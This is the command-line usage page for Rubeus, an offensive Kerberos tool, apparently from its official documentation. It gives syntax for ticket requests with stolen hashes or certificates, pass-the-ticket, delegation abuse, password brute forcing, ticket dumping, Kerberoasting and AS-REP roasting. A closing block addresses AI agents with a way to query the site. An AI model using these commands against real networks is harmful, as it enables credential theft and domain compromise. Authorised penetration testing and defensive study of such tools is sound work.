# Command Line Usage ``` (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.6.3 Ticket requests and renewals: Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID: Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session: Rubeus.exe asktgt /user:USER /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session: Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session: Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket: Rubeus.exe asktgs [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till limit: Rubeus.exe renew [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap] Perform a Kerberos-based password bruteforcing attack: Rubeus.exe brute [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap] Constrained delegation abuse: Perform S4U constrained delegation abuse: Rubeus.exe s4u /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] Rubeus.exe s4u /user:USER [/domain:DOMAIN] /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] Perform S4U constrained delegation abuse across domains: Rubeus.exe s4u /user:USER [/domain:DOMAIN] /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] Ticket management: Submit a TGT, optionally targeting a specific LUID (if elevated): Rubeus.exe ptt [/luid:LOGINID] Purge tickets from the current logon session, optionally targeting a specific LUID (if elevated): Rubeus.exe purge [/luid:LOGINID] Parse and describe a ticket (service ticket or TGT): Rubeus.exe describe Ticket extraction and harvesting: Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service: Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID: Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID: Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap] Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation: Rubeus.exe tgtdeleg [/target:SPN] Monitor every /interval SECONDS (default 60) for new TGTs: Rubeus.exe monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS] Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working cache every /displayinterval SECONDS (default 1200): Rubeus.exe harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS] Roasting: Perform Kerberoasting: Rubeus.exe kerberoast [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/nowrap] Perform Kerberoasting, outputting hashes to a file: Rubeus.exe kerberoast /outfile:hashes.txt [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] Perform Kerberoasting, outputting hashes in the file output format, but to the console: Rubeus.exe kerberoast /simple [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/nowrap] Perform Kerberoasting with alternate credentials: Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/nowrap] Perform Kerberoasting with an existing TGT: Rubeus.exe kerberoast [/nowrap] Perform Kerberoasting with an existing TGT using an enterprise principal: Rubeus.exe kerberoast /enterprise [/nowrap] Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail: Rubeus.exe kerberoast /autoenterprise [/nowrap] Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts: Rubeus.exe kerberoast /usetgtdeleg [/nowrap] Perform "opsec" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts: Rubeus.exe kerberoast /rc4opsec [/nowrap] List statistics about found Kerberoastable accounts without actually sending ticket requests: Rubeus.exe kerberoast /stats [/nowrap] Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter): Rubeus.exe kerberoast /ldapfilter:'admincount=1' [/nowrap] Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets: Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/nowrap] Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%: Rubeus.exe kerberoast /delay:5000 /jitter:30 [/nowrap] Perform AES Kerberoasting: Rubeus.exe kerberoast /aes [/nowrap] Perform AS-REP "roasting" for any users without preauth: Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/nowrap] Perform AS-REP "roasting" for any users without preauth, outputting Hashcat format to a file: Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] Perform AS-REP "roasting" for any users without preauth using alternate credentials: Rubeus.exe asreproast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU,..."] [/nowrap] Miscellaneous: Create a hidden program (unless /show is passed) with random /netonly credentials, displaying the PID and LUID: Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" [/show] Reset a user's password from a supplied TGT (AoratoPw): Rubeus.exe changepw /new:PASSWORD [/dc:DOMAIN_CONTROLLER] Calculate rc4_hmac, aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 hashes: Rubeus.exe hash /password:X [/user:USER] [/domain:DOMAIN] Substitute an sname or SPN into an existing service ticket: Rubeus.exe tgssub /altservice:ldap [/ptt] [/luid] [/nowrap] Rubeus.exe tgssub /altservice:cifs/computer.domain.com [/ptt] [/luid] [/nowrap] Display the current user's LUID: Rubeus.exe currentluid The "/consoleoutfile:C:\FILE.txt" argument redirects all console output to the file specified. The "/nowrap" flag prevents any base64 ticket blobs from being column wrapped for any function. NOTE: Base64 ticket blobs can be decoded with : [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("aa...")) ``` ### --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://specterops.gitbook.io/ghostpack/rubeus/introduction/command-line-usage.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.